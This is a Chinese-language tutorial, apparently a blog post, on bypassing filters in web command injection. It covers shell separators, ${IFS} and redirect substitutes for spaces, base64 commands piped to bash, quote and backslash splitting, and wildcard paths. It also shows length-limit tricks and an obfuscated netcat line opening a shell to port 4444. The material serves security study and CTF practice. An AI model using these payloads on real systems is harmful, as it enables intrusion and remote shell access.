命令注入绕过方式总结

简介: 前言命令注入是web中常见的漏洞之一,由于web应用程序未对用户提交的数据做严格的过滤,导致用户输入可以直接被linux或windows系统当成命令执行,一般都会造成严重的危害。

常用符号

分号(;)

多条语句顺序执行时的分割符号。


cmd1;cmd2

管道符(|)

cmd1命令的输出,作为下一条命令cmd2的参数。


cmd1|cmd2

and(&&)

与命令,cmd1成功则执行cmd2,cmd1失败则不执行cmd2


cmd1 && cmd2

or(||)

或命令,cmd1失败则执行cmd2,cmd1成功则不执行cmd2


cmd1 || cmd2

反引号()和$()

反引号和$()都可用来表示命令,被这两种方式包含的字符串都会被当做命令首先执行。



echo "result : `whoami`"echo "result : $(whoami)"

绕过方式总结

空格绕过

在过滤了空格的系统中,以cat flag.txt为例,系统不允许我们输入空格或输入后被过滤。

${IFS}

可使用${IFS}代替空格。




cat${IFS}flag.txtcat$IFS$1flag.txtcat${IFS}$1flag.txt

重定向符绕过(<>)



cat<>flag.txtcat<flag.txt

%09(需要php环境)

php环境下web输入%09等效于TAB


cat%09flag.txt

黑名单绕过

拼接

使用shell变量拼接被黑名单限制的关键词


a=c;b=at;c=fl;d=ag;e=.txt;$a$b $c$d$e;

base64

使用反引号包含base64解码后的命令


`echo "Y2F0IGZsYWcudHh0Cg==" | base64 -d`

将base64解码后的命令通过管道符传递给bash


echo "Y2F0IGZsYWcudHh0Cg==" | base64 -d | bash

单引号,双引


c""at fl''ag.tx""t

反斜杠


c\at fl\a\g.tx\t

$1


ca$1t fl$1ag.t$1xt

读文件绕过













(1)more:一页一页的显示档案内容(2)less:与 more 类似,但是比 more 更好的是,他可以[pg dn][pg up]翻页(3)head:查看头几行(4)tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示(5)tail:查看尾几行(6)nl:显示的时候,顺便输出行号(7)od:以二进制的方式读取档案内容(8)vi:一种编辑器,这个也可以查看(9)vim:一种编辑器,这个也可以查看(10)sort:可以查看(11)uniq:可以查看(12)file -f:报错出具体内容

通配符绕过

/???会去寻找 / 目录下的三个字符长度的文件,正常情况下会寻找到/bin,然后/?[a][t]会优先匹配到/bin/cat,就成功调用了cat命令,然后后面可以使用正常的通配符匹配所需读的文件,如flag.txt文件名长度为8,使用8个?’’,此命令就会读取所有长度为8的文件。


/???/?[a][t] ?''?''?''?''?''?''?''?''

同理,我们也可以匹配/bin下的其他命令,如more,less,vi,tail等命令来查看文件,或者执行其他命令。


/???/[m][o]?[e] ?''?''?''?''?''?''?''?''

/???/[t]?[i][l] ?''?''?''?''?''?''?''?''

甚至开启一个shell


/???/[n]?[t]??[t] -lvp 4444

/???/[n]?[t]??[t] 192.168.1.3 4444

命令嵌套


echo "result:`whoami`"

echo "result:$(uname -a)"

长度绕过

使用>>绕过长度限制

使用>>每次添加一部分命令到文件中





echo -n "cmd1" > r;echo -n "cmd2" >> r;echo -n "cmd3" >> r;echo "cmd4" >> r;

然后使用cat r | bash执行命令

使用换行执行和ls -t绕过长度限制

linux中,文件中的命令如果需要换行书写,需要在前一行末尾增加\,如文件a中有




ca\t flag.t\xt

使用sh a即可执行命令cat flag.txt

ls -t可根据时间创建顺序逆序输出文件名

a可以创建一个名为a的文件

按照这个思路,可以使用





> "ag"> "fl\\"> "t \\"> "ca\\"

然后使用ls -t > s

s中文件内容就是







sca\t \fl\ag\其他的无关内容

之后使用sh s,即可执行cat flag

目录
相关文章
|
8月前
|
XML 安全 测试技术
XXE 外部实体注入漏洞
XXE 外部实体注入漏洞
69 0
|
3月前
|
SQL 数据库
SQL注入基础(报错注入及延时注入)
SQL注入基础(报错注入及延时注入)
23 0
|
8月前
|
安全 API Windows
3.1 DLL注入:常规远程线程注入
动态链接库注入技术是一种特殊的技术,它允许在运行的进程中注入DLL动态链接库,从而改变目标进程的行为。DLL注入的实现方式有许多,典型的实现方式为远程线程注入,该注入方式的注入原理是利用了`Windows`系统中提供的`CreateRemoteThread()`这个API函数,该函数第四个参数是准备运行的线程,我们将`LoadLibrary()`函数填入其中,这样就可以执行远程进程中的`LoadLibrary()`函数,进而将我们自己准备的DLL加载到远程进程空间中执行,DLL在被装载后则会自动执行初始化部分。
76 0
|
4月前
|
安全 应用服务中间件 PHP
文件上传解析漏洞,以及检测方式的绕过
文件上传解析漏洞,以及检测方式的绕过
|
9月前
|
安全 Unix 关系型数据库
3.10 使用tamper绕过时间戳进行注入
3.10 使用tamper绕过时间戳进行注入
|
5月前
|
Python
关于SSTI模块注入的常见绕过方法
关于SSTI模块注入的常见绕过方法
75 0
|
8月前
|
网络协议 Shell Linux
MSSQL站库分离注入绕过WDF提权
MSSQL站库分离注入绕过WDF提权
153 0
|
8月前
|
安全 UED Windows
3.3 DLL注入:突破会话0强力注入
Session是`Windows`系统的一个安全特性,该特性引入了针对用户体验提高的安全机制,即拆分Session 0和用户会话,这种拆分`Session 0`和`Session 1`的机制对于提高安全性非常有用,这是因为将桌面服务进程,驱动程序以及其他系统级服务取消了与用户会话的关联,从而限制了攻击者可用的攻击面。
48 0
|
12月前
|
安全 Shell PHP
干货 | 命令执行(RCE)面对各种过滤,骚姿势绕过总结
干货 | 命令执行(RCE)面对各种过滤,骚姿势绕过总结
435 0